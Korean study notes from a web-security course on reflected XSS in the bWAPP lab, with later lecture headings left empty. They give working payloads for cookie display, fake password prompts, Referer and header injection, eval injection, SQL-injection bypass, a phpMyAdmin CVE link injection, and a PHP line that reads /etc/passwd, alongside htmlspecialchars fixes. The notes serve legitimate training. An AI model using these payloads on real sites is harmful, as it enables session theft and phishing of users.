----------------------------------------------------------------------------------------------------------------------------------------------------------------
43강.Cross-Site Scripting(XSS) - Reflected(GET)

 1) Reflected 방식
 - 공격자가 태그/스크립트를 삽입한 URL을 클라이언트가 사용했을 경우, 서버로 HTTP 요청을 보내고 응답 받을시
   태그/스크립트가 클라이언트에서 실행되는 방식
 - 그렇기 때문에 클라이언트는 실제 웹 싸이트 접근이 아닌 피싱 사이트로 접속되는 문제가 발생할 수 있다.
 - 공격자가 악의적인 URL을 유포하는 방법 : 이메일, 게시판에 URL 링크 정보 노출, SNS를 통해서 URL 링크 정보 노출
 - Ex) URL 클릭시 : 피싱 사이트 접속 이후 개인 정보 유출, 바탕화면에 쓸때 없는 아이콘 생성 및 불필요한 프로그램 설치

 
 2) Stored 방식
  - 공격자가 서버(게시판)에 태그/스크립트를 저장시켜, 클라이언트가 게시판을 읽을 경우 태그/스크립트가 실행되는 방식
  - Ex) 게시판을 읽을 경우 : 쿠기 정보 갈취, 악성 코드 유입, 랜섬웨어, 피싱 사이트 접속, 불필요한 프로그램 설치


3. Cross-Site Scripting(XSS) - Reflected(GET)
 - 이 시나리오는 HTML Injection - Reflectet(GET)과 동일하다.
 - 스크립트를 로그인 폼에 인젝션하여 쿠키 정보 획득 또는 의도하지 않는 동작을 발생시킬수 있다.


dvwa 에서 했으므로 pass

보안코드

 function xss_check_3($data, $encoding = "UTF-8")
{
    // htmlspecialchars - converts special characters to HTML entities   
    // '&' (ampersand) becomes '&amp;'
    // '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set
    // "'" (single quote) becomes '&#039;' (or &apos;) only when ENT_QUOTES is set
    // '<' (less than) becomes '&lt;'
    // '>' (greater than) becomes '&gt;' 
    return htmlspecialchars($data, ENT_QUOTES, $encoding); 
}

 

1.
htmlspecialchars() 함수
       인코딩 후에
       $name = htmlspecialchars( $_GET[ 'name' ] );
        //http://www.w3big.com/ko/php/func-string-htmlspecialchars.html
        //특수문자를 변환시켜서 문자로만 출력되고 기능은 상실시키는 함수
        //          특수 문자			변환된 문자
        //          &(앰퍼샌드)		&amp;
        //          ""(겹따옴표)		&quot;
        //          ''(홑따옴표) 		&#039;
        //          <(미만) 			&lt;
        //          >(이상)			&gt;


2. stripslashes()
3.파라미터 고정
----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
44강.Cross-Site Scripting(XSS) - Reflected(POST)

post 경우 버프스위트등과 같은 프로그램등 패킷을 조작하여 body 부분에 자바스크립트 코드를 입력한다

보안코드는 전강의와 같다

----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
45강.Cross-Site Scripting(XSS) - Reflected(JSON)

1. JSON(JavaScript Object Notation)
 - 자바스크립트 기반으로 개발됬으며, 여러 프로그래밍 언어에도 사용할 수 있는 독립형 언어
 - 웹 브라우저와 웹 서버 간 비동기 통신, 웹 서버 간의 데이터 교환 등에 주로 사용

 - Ex) 자바스크립과 PHP 간에 JSON으로 데이터 전달



2. Cross-Site Scripting(XSS) - Reflected(JSON)
 - 이 시나리오는 스크립트를 입력 폼에 인젝션하여 쿠키 정보 획득 또는 의도하지 않는 동작을 발생시키는 내용이다.



    <script>
    //값이 없을때
        var JSONResponseString = '{"movies":[{"response":"HINT: our master really loves Marvel movies :)"}]}';
    //값을 입력 받았을때     
        var JSONResponseString = '{"movies":[{"response":"aaaa??? Sorry, we don&#039;t have that movie :("}]}';
        
        // var JSONResponse = eval ("(" + JSONResponseString + ")");
        var JSONResponse = JSON.parse(JSONResponseString);

        document.getElementById("result").innerHTML=JSONResponse.movies[0].response;
    </script>


json으로 짜여있다해도 코드의 구조를 파악하여 자바스크립트 명령어를 입력할 수 있다.

"}]}';</script><script>prompt('Please enter your password.')</script><script>

var JSONResponseString = '{"movies":[{"response":""}]}';</script><script>prompt('Please enter your password.')</script><script>??? Sorry, we don&#039;t have that movie :("}]}';


보안코드는 전강의와 같다
----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
46강.Cross-Site Scripting(XSS) - Reflected(AJAX/JSON)


1. AJAX(Asynchronous Javascript And XML)

 - 다른 도메인의 서버 URL을 호출하여 데이터를 가져올 수 있는 기능을 수행한다.
 - 사용자와 웹페이지와 자유롭게 상호작용 할 수 있는 기능을 수행한다.
 - 별도의 프로그램 없이 웹페이지를 다시 로딩할 필요 없이 내용, 메뉴 등을 제공한다.
 - 서버 처리를 대기하지 않고, 비동기 요청이 가능하다.



 

3. JSON(JavaScript Object Notation)

 - 자바스크립트 기반으로 개발됬으며, 여러 프로그래밍 언어에도 사용할 수 있는 독립형 언어
 - 웹 브라우저와 웹 서버 간 비동기 통신, 웹 서버 간의 데이터 교환 등에 주로 사용
 - Ex) 자바스크립과 PHP 간에 JSON으로 데이터 전달

 
 보안을 할때 항상 새로운 것을 보듯이 해야한다. 
 익숙해진 자신만의 패턴으로 바라보아서는 안된다.
 
 - 이 시나리오는 웹페이지를 접근하면 'xss_ajax_2-1.php' 페이지가 먼저 실행된다.
 - 폼에 입력되는 내용들은 'xss_ajax_2-2.php'로 넘겨버리기 때문에 인젝션하면 바로 XSS가 실행되지 않는다.
 
 왜? 실행이 되지 않을까???
 xss_ajax_2-2.php에서 백엔드에 보내는 코드의 구조를 모르기 때문이다.
 그러나 버프스위트등 패킷을 잡아 xss_ajax_2-2.php 로가는 패킷 잡으면 그 구조를 파악할 수 있다.


{"movies":[{"response":"HINT: our master really loves Marvel movies :)"}]}

이런 
"}]}';</script><script>prompt('Please enter your password.')</script><script>
입력해보자
물론 나오지는 않을 것이다.
xss_ajax_2-2.php 에서 처리되지 않았기 때문에

방법은 두가지 있는데 버프스위트의 request broswer 기능을 이용하거나
아님 
get, post 방식을 이용하여 직접 주소로 들어가는 방법이 있다 

이렇게
http://192.168.189.128/bWAPP/xss_ajax_2-2.php?title=%3Cscript%3Ealert(document.cookie)%3C/script%3E


보안코드는 전강의와 같다.

----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
47강.Cross-Site Scripting(XSS) - Reflected(AJAX/XML)

1. AJAX(Asynchronous Javascript And XML)
 - 다른 도메인의 서버 URL을 호출하여 데이터를 가져올 수 있는 기능을 수행한다.
 - 사용자와 웹페이지와 자유롭게 상호작용 할 수 있는 기능을 수행한다.
 - 별도의 프로그램 없이 웹페이지를 다시 로딩할 필요 없이 내용, 메뉴 등을 제공한다.
 - 서버 처리를 대기하지 않고, 비동기 요청이 가능하다.


2. XML(Extensible Markup Language)
 - HTML을 개선하여 만든 언어이다.
 - 홈페이지 구축기능, 검색기능 등이 향상되었고, 웹 페이지의 추가와 작성이 편리해졌다.
 - XML을 이용하면 사용자가 구조화된 데이터베이스를 조작할 수 있다.


xml 로 이루어진 코드라도 자바스크립트를 입력할 수 있다.

&lt;img src='#' onerror='alert(1)'&gt;
&lt;img src=&apos;#&apos; onerror=&apos; alert("Warning")&apos; &gt;

이 강의에서 알아야 하는 것은 

&apos;

 - 어퍼스트로피라고 불리우며, 웹브라우저에서 특정 문자를 표현할때 &apos;로 입력하면 '(작은따옴표)로 인식한다.
 - 또는 브라우저 상에서 '(작은따옴표)를 인식하지 못하면 &apos; 나오기도 한다.
 - 자바스크립트를 이용하여 문자열을 입력할때 '(작은따옴표)가 연속으로 입력하면 오류가 나는 경우가 있다.
 
 " 와 ' 는 서로 다르게 인식하는데 기능은 같기 떄문에 우회가 가능하다 고로


 function xss_check_3($data, $encoding = "UTF-8")
{

    // htmlspecialchars - converts special characters to HTML entities   
    // '&' (ampersand) becomes '&amp;'
    // '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set
    // "'" (single quote) becomes '&#039;' (or &apos;) only when ENT_QUOTES is set
    // '<' (less than) becomes '&lt;'
    // '>' (greater than) becomes '&gt;' 
    return htmlspecialchars($data, ENT_QUOTES, $encoding); 
    
}

" 와 ' 를 같게 인식하는 ENT_QUOTES 를 반드시 사용한다
----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
48강.Cross-Site Scripting(XSS) - Reflected(Back Button)

- 이 시나리오는 페이지 이동 버튼을 클릭했을때, 인젝션된 스크립트가 동작하도록 하는 내용이다.

특정 사이트로 이동하는데 그게 이동전 사이트라면 (뒤로 가기 버튼을 이용하는 경우가 많음 똑같은 url 을 두번 치면 뒤로가기가 제자리 거름이 되기때문)


 <input type=button value="Go back" onClick="document.location.href=''">
위 코드는 php 백엔드에 의해서 나온 결과일뿐 실제 작동은 사용자의 전 페이지로 이동하게 설정되서 나올 것 이다.

똑같은 url 을 두번 치면 뒤로가기가 제자리 거름으로 만들고

버프스위트로 잡아서 
코드를 조작해보자
백엔드에서 위 코드로 이동할 페이지를 보낸다면
Referer 값을 보낸다고 의심할 수 있다.
Referer 의 기존 값을 지우고 위 코드에 작동 할 수 있게

';alert(document.cookie);"
이렇게 코드를 넣어 보자

<input type=button value="Go back" onClick="document.location.href='';alert(document.cookie);"'">

그리고나서 다시 버튼을 누르면 쿠키값이 나올 것이다.

실제로 공격이 이뤄질 수 있는지...? 조금 애매한 취약점이지만 취약점은 없을 수록 좋다.
무튼 값이 이동한다면 전부 보안을 해야한다.

보안코드는 위 강의와 같다

----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
49강.Cross-Site Scripting(XSS) - Reflected(Custom Header)

 - 이 시나리오는 헤더에 bWAPP 헤더를 추가하고, 여기에 스크립트를 삽입하여 XSS가 실행되게 하는 내용이다.
 
 헤더를 대놓고 알려줬으니
 버프로 잡고
 bWAPP: <script>alert(1)</script> 
를 추가하면 쿠키가 나온다.

----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
50강.Cross-Site Scripting(XSS) - Reflected(Eval)


1. 'eval'  함수
 - 문자열을 입력 받아 그 문자열을 수식 계산하여 처리한 이후 결과값을 반환하는 함수이다.
 - eval 함수는 문자를 PHP 함수로 인식하여 출력하는 취약점을 갖고 있다.
 - 그렇기 때문에 공격자가 eval 함수를 사용하는것을 알게되면, 악성 쿼리문을 인젝션할 수 있다

----------------------
<?php
$a = 'CCNA';
$b = 'Cisco';
$c = '$a is $b certification';
echo $a. '<br>';
echo $b. '<br>';
echo $c. '<br>';
eval("\$c = \"$c\";");
echo $c. '<br>';
?>
<br>

 

<?php
echo "CCNP". '<br>';
eval("echo \"CCIE\";"). '<br>';
?>
<br>
<br>

 

<?php
eval("echo \"CCNA\"; system('cat /etc/passwd | head -3');");
?>
----------------------

eval() 함수
이 안에 들어가는 값은 전부 명령어 처리된다.

 - 이 시나리오는 PHP 인젝션 & eval() 함수 취약점을 이용하여 XSS를 실행하는 내용이다. 

http://192.168.189.128/bWAPP/xss_eval.php?date=Date()

date 가 무언가를 값을 전달 받았다는 것을 알 수 있다.(의심)
만약 eval() 함수라면 명령어를 넣으면 실행될 것 이다.

http://192.168.189.128/bWAPP/xss_eval.php?date=alert(document.cookie)
eval() 함수는 <script> 등을 안 써줘야 작동한다.


보안코드는...먼저 안쓰는게 제일 좋다. 쓰기에 굉장히 위험한 함수이다.(커맨드 인젝션도 가능하기 때문)
그래도 써야한다면
--------------------------------------------------------------------------  
  <p>
    <script>
    eval("document.write(<?php echo xss($_GET["date"])?>)");
    </script>
  </p>

--------------------------------------------------------------------------
처럼쓰고 여기에
전 강의처럼 최소 3가지처리를 해주어야한다.


----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
51강.Cross-Site Scripting(XSS) - Reflected(HREF)

1. HREF

 - hypertext reference
 - 텍스트, 이미지, 버튼을 클릭하면 현재 페이지에서 다른 페이지로 이동해주는 기능


2. Cross-Site Scripting(XSS) - Reflected(HREF)

 - 이 시나리오는 본인 이름을 입력한 이후, 'Vote' 버튼을 클릭하면 하이퍼링크를 통해서 투표가 진행된다.
 - 페이지 전환 순서 : 'xss_href-1.php' -> 'xss_href-2.php' -> 'xss_href-3.php'
 - 이를 통해서 스크립트 인젝션을 실시하여 XSS를 실행할 수 있다.


<a href='url'></a>
는 
<script><a href='url'></a></script>
이런 구조이다.
만약에 url 을 
폼값으로 받아서 작동한다면

아래값을 넣으면 작동된다.
ㅁㅁㅁㅁ></a></script><script>alert(document.cookie)</script>

<script><a href='ㅁㅁㅁㅁ></a></script><script>alert(document.cookie)</script>'></a></script>
쿠키값이 나오게 되는 것이다.

그렇다면
역시 폼값으로 받은 변수값을 처리해야 한다

스팸 메일을 보낸다면

zxc></script><script>prompt('Please enter your password.')</script>
이런 값을 넣어서 비밀번호를 입력하게끔 유도할 수 있다.

html 인젝션도 가능하다.
사이트에 따라 사이트 조작도 가능하다.


Kim onmouseover=alert('Warning') zxc
이런것도 가능하다.

더 활용하면 정교한 피싱도 가능하다

Kim onclick=alert('Warning') zxc


최종적으로는 <script><a href='url'></a></script> 여기에

<script><a href='Kim onclick=alert('투표하신다면 비밀번호를 입력해주세요.') zxc'></a></script>

되어서 vote를 누를시 비밀번호를 누르도록 유도하여 피싱을 할 수 있다.






보안코드

 function xss_check_3($data, $encoding = "UTF-8")
{
    // htmlspecialchars - converts special characters to HTML entities   
    // '&' (ampersand) becomes '&amp;'
    // '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set
    // "'" (single quote) becomes '&#039;' (or &apos;) only when ENT_QUOTES is set
    // '<' (less than) becomes '&lt;'
    // '>' (greater than) becomes '&gt;' 
    return htmlspecialchars($data, ENT_QUOTES, $encoding); 
}

 

1.
htmlspecialchars() 함수
       인코딩 후에
       $name = htmlspecialchars( $_GET[ 'name' ] );
        //http://www.w3big.com/ko/php/func-string-htmlspecialchars.html
        //특수문자를 변환시켜서 문자로만 출력되고 기능은 상실시키는 함수
        //          특수 문자			변환된 문자
        //          &(앰퍼샌드)		&amp;
        //          ""(겹따옴표)		&quot;
        //          ''(홑따옴표) 		&#039;
        //          <(미만) 			&lt;
        //          >(이상)			&gt;


2. stripslashes()
3.파라미터 고정
----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
52강.Cross-Site Scripting(XSS) - Reflected(Login Form)

 - 이 시나리오는 SQL 인젝션이 가능한 입력폼에 스크립트를 인젝션하여 XSS를 실행하는 내용이다.

로그인 창은 아이디가 있는지 확인을 하기 때문에
html , xss 인젝션이 작동을 하지 않는다.(일단 있는 아이디가 뭔지 모르기 때문에)


그런데
sql 인젝션이 되면 아이디를 몰라도 되는 상황을 만들어주어서
두 공격을 결합하면 html , xss 인젝션이 가능하다.

'
인젝션 취약여부 파악

' or 1=1; 
쿼리문 우회 코드 파악


' or 1=1; <script>alert(document.cookie)</script>
인젝션


' or 1=1; <h1>aaaaa</h1>
사이트에 따라 html 인젝션도 가능하다.



----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
53강.Cross-Site Scripting(XSS) - Reflected(phpMyAdmin)


 - 이 시나리오는 PHP 관리자 페이지 관련 파일 중에 'error.php'에 BBcode(@)를 이용하여 XSS를 실행하는 내용이다.
 - 취약점 버전 : PhpMyAdmin 3.3.8.1, 3.4.0-beta1 이전 버전
 - CVE-2010-4480 참조 사이트 : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4480

취약한 버전에서는 
http://192.168.189.128/phpmyadmin/error.php?type=cisco
로 들어가서 url 로 원하는 페이지를 부를수 있다
http://192.168.189.128/phpmyadmin/error.php?type=cisco&error=ccna+dump+download+[a@http://192.168.20.205/bWAPP/ccna.html@]click+here[/a]

이는 파일 업로드와 연동하여 공격할 수 있다.

----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
54강.Cross-Site Scripting(XSS) - Reflected(PHP_SELF)





----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
55강.Cross-Site Scripting(XSS) - Reflected(Referer) (1)






----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
56강.Cross-Site Scripting(XSS) - Reflected(User-Agent)






----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
57강.Cross-Site Scripting(XSS) - Stored(Blog)






----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
58강.Cross-Site Scripting(XSS) - Stored(Change Secret)
----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
59강.Cross-Site Scripting(XSS) - Stored(Cookies)





----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
60강.Cross-Site Scripting(XSS) - Stored(SQLiteManager)





----------------------------------------------------------------------------------------------------------------------------------------------------------------






----------------------------------------------------------------------------------------------------------------------------------------------------------------
61강.Cross-Site Scripting(XSS) - Stored(User-Agent)





----------------------------------------------------------------------------------------------------------------------------------------------------------------
